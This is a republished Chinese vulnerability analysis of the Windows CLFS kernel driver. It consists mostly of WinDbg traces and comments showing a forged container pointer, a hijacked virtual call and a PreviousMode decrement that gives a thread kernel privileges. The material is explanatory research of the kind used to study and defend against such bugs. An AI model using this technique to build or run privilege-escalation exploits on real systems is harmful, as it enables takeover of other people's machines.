[原创]年终clfs漏洞汇总分析 | 宜武汇-ag真人国际厅网站

bp clfs!cclfsbasefilepersisted::loadcontainerq

bp clfs!cclfsbasefile::getsymbol

0: kd> r

rax=0000000000000000 rbx=0000000000000000 rcx=ffffc784287c1000

rdx=0000000000001528 rsi=ffffdc0782e5c398 rdi=0000000000001528

rip=fffff80026ee2670 rsp=ffffb30823028f88 rbp=ffffb30823029760

 r8=0000000000000000  r9=ffffb30823029050 r10=fffff800272a7040

r11=ffffb308230289e0 r12=0000000000000000 r13=0000000000000000

r14=ffffc784287c1000 r15=ffffb30823029198

iopl=0         nv up ei pl nz na po nc

cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00040206

clfs!cclfsbasefile::getsymbol:

fffff800`26ee2670 48895c2418      mov     qword ptr [rsp 18h],rbx ss:0018:ffffb308`23028fa0=ffffdc0782e5c398

2: kd> k

 # child-sp          retaddr           call site

00 ffffb308`23704f88 fffff800`26ee7294 clfs!cclfsbasefile::getsymbol

01 ffffb308`23704f90 fffff800`26eb3156 clfs!cclfsbasefilepersisted::loadcontainerq 0x2a4

02 ffffb308`23705100 fffff800`26edeb7b clfs!cclfslogfcbphysical::initialize 0x6da

03 ffffb308`23705240 fffff800`26ee0abb clfs!cclfsrequest::create 0x4ef

04 ffffb308`23705390 fffff800`26ee0887 clfs!cclfsrequest::dispatch 0x97

05 ffffb308`237053e0 fffff800`26ee07d7 clfs!clfsdispatchiorequest 0x87

0: kd> gu

0: kd> dq poi(ffffb30823029050)

ffffdc07`82e5d598  00000030`00000000 00000000`00100000

//pcontainer指针

ffffdc07`82e5d5a8  00000000`00000000 00000000`40000000

ffffdc07`82e5d5b8  00000002`00000001 00000000`00000000

//下pcontainer指针硬件访问断点

ba w8  ffffdc07`82e5d598 18

breakpoint 3 hit

clfs!cclfsbasefilepersisted::loadcontainerq 0x4e5:

fffff800`26ee74d5 4885c9          test    rcx,rcx

//loadcontainerq中将container_context中pcontainer指针覆盖为新申请的容器对象实例指针

0: kd> dps  poi(ffffdc07`82e5d5b0)

ffffdc07`8291bab0  fffff800`26ec35f0 clfs!cclfscontainer::`vftable'

ffffdc07`8291bab8  00000000`00000000

ffffdc07`8291bac0  00000000`00000000

0: kd> dq ffffdc07`82e5d598

ffffdc07`82e5d598  00000030`00000000 00000000`00100000

ffffdc07`82e5d5a8  00000000`00000000 ffffdc07`8291bab0

ffffdc07`82e5d5b8  00000002`00000001 00000000`00000000

1: kd> g

breakpoint 3 hit

clfs!cclfslogfcbphysical::flushmetadata 0x5d:

fffff800`26eb158d 488b83a8010000  mov     rax,qword ptr [rbx 1a8h]

1: kd> r

rax=0000000040000000 rbx=ffffc784288ed000 rcx=ffff80002b167180

rdx=0000000000000031 rsi=ffffc7842a3d2930 rdi=0000000000000000

rip=fffff80026eb158d rsp=ffffb30823029680 rbp=0000000000000001

 r8=0000000000000804  r9=ffffdc0782e5d590 r10=0000000000000000

r11=ffffdc0782e5c000 r12=ffffc784297e9dc8 r13=0000000000000000

r14=ffffc784297e9ee8 r15=ffffc78422c79c01

iopl=0         nv up ei ng nz na po nc

cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00040286

clfs!cclfslogfcbphysical::flushmetadata 0x5d:

fffff800`26eb158d 488b83a8010000  mov     rax,qword ptr [rbx 1a8h] ds:002b:ffffc784`288ed1a8=0000000200000001

1: kd> k

 # child-sp          retaddr           call site

00 ffffb308`23029680 fffff800`26ef1503 clfs!cclfslogfcbphysical::flushmetadata 0x5d

01 ffffb308`230296d0 fffff800`26eeea25 clfs!cclfslogfcbvirtual::cleanup 0x213

02 ffffb308`23029760 fffff800`26eee939 clfs!cclfslogccb::cleanup 0xb1

03 ffffb308`230297b0 fffff800`26ee0955 clfs!cclfsrequest::cleanup 0x65

0c 0000000a`dc5ff920 00000000`00000000 0x00007ff8`d566a395

//flushmetadata中获取的clientcontext是与clfs_container_context重叠的内存.伪代码如下cltctx->llcreatetime.quadpart = that->field_ctratetime_1a0;替换pcontainer指针为旧值

1: kd>  dq ffffdc07`82e5d598

ffffdc07`82e5d598  00000030`00000000 00000000`00100000

ffffdc07`82e5d5a8  00000000`00000000 00000000`40000000

ffffdc07`82e5d5b8  00000002`00000001 00000000`00000000

3: kd> kv

 # child-sp          retaddr           : args to child                                                           : call site

00 ffffb308`23029618 fffff800`26eb8655 : ffffc784`287c1000 ffffc784`288ed000 00000000`00000000 fffff800`26eceb01 : clfs!cclfscontainer::close

01 ffffb308`23029620 fffff800`26eb87b6 : ffffdc07`82e5d598 ffffc784`288ed000 fffff800`26eceb20 00000000`00000000 : clfs!cclfslogfcbphysical::closecontainers 0x69

02 ffffb308`23029650 fffff800`26eb8761 : 00000000`00000000 ffffc784`288ed000 fffff800`26eceb20 ffffc784`288ed2f8 : clfs!cclfslogfcbphysical::finalize 0x42

03 ffffb308`23029680 fffff800`26eb9889 : ffffc784`2883d801 ffffc784`288ed250 00000000`00000000 ffffc784`297e9e28 : clfs!cclfslogfcbphysical::release 0xb1

04 ffffb308`230296e0 fffff800`26eddfd2 : ffffc784`2883d830 ffffc784`2883d801 00000000`00000000 ffffc784`2883d830 : clfs!cclfslogfcbvirtual::release 0x69

05 ffffb308`23029720 fffff800`26ee0908 : ffffc784`2883d830 ffffc784`22c79c80 ffffc784`2883d830 00000000`00000000 : clfs!cclfsrequest::close 0xd6

06 ffffb308`23029770 fffff800`26ee07d7 : ffffc784`2883d830 ffffc784`2883d830 00000000`00000000 fffff800`27cf4204 : clfs!clfsdispatchiorequest 0x108

3: kd> r

//rcx就是pcontainer指针为旧值

rax=0000000000000000 rbx=ffffc784288ed000 rcx=0000000040000000

rdx=0000000000000000 rsi=0000000000000000 rdi=0000000000000000

rip=fffff80026eeb438 rsp=ffffb30823029618 rbp=ffffdc0782e5d598

 r8=ffffb30823029550  r9=ffffdc0782e5c070 r10=0000000000000000

r11=ffffdc0782e5c000 r12=0000000000000000 r13=0000000000000001

r14=fffff80026eceb20 r15=ffffc78422c79c80

iopl=0         nv up ei pl nz na po nc

cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00040206

clfs!cclfscontainer::close:

fffff800`26eeb438 48895c2408      mov     qword ptr [rsp 8],rbx ss:0018:ffffb308`23029620=ffffc784287c1000

3: kd> dq 0000000040000000

00000000`40000000  0000010d`844b0000 00000000`00000000

00000000`40000010  00000000`00000000 00000000`00000000

00000000`40000020  00000000`0000009c 00000000`00000000

//ullkthreadaddress dwthreadpremodepos 0x30;就是thread的premode地址

00000000`40000030  ffffc784`29c79322 00000000`00000000

//threadpremode地址

00000000`40000030  ffffc784`26d0b2e2 00000000`00000000

//调用pcontainer指针为伪造的虚表函数地址

rax=fffff80026f10190 rbx=ffffc784288ed000 rcx=0000000040000000

rdx=00000000746c6644 rsi=0000000000000000 rdi=0000000000000000

rip=fffff80026eb8660 rsp=ffffb30823029620 rbp=ffffdc0782e5d598

 r8=ffffc7842a3ce08e  r9=0000000000000006 r10=fffff80027216270

r11=ffffc78426d0b080 r12=0000000000000000 r13=0000000000000001

r14=fffff80026eceb20 r15=ffffc78422c79c80

iopl=0         nv up ei ng nz na pe nc

cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00040282

clfs!cclfslogfcbphysical::closecontainers 0x74:

fffff800`26eb8660 ff157abf0100    call    qword ptr [clfs!_guard_dispatch_icall_fptr (fffff800`26ed45e0)] ds:002b:fffff800`26ed45e0={clfs!guard_dispatch_icall_nop (fffff800`26ebd4e0)}

5: kd> ln rax

(fffff800`26f10190)   clfs!clfssetendoflog   |  (fffff800`26f101f0)   clfs!clfssetlogfileinformation

4: kd> !thread

thread ffffc78429c790c0  cid 15bc.08e4  teb: 00000040e33dc000 win32thread: 0000000000000000 running on processor 4

child-sp          retaddr           : args to child                                                           : call site

ffffb308`23835618 fffff800`26eb8655 : ffffc784`280ef000 ffffc784`29603000 00000000`00000000 fffff800`26eceb01 : clfs!cclfscontainer::close

obfdereferenceobject递减thread的premode地址, 将当前线程模式改为内核模式

4: kd> dt nt!_kthread ffffc78429c790c0  -y previous

    0x232 previousmode : 0 ''

原文链接:https://bbs.kanxue.com/thread-275566.htm

网络摘文,本文作者:15h,如若转载,请注明出处:https://www.15cov.cn/2023/08/27/原创年终clfs漏洞汇总分析/

发表评论

邮箱地址不会被公开。 必填项已用*标注

网站地图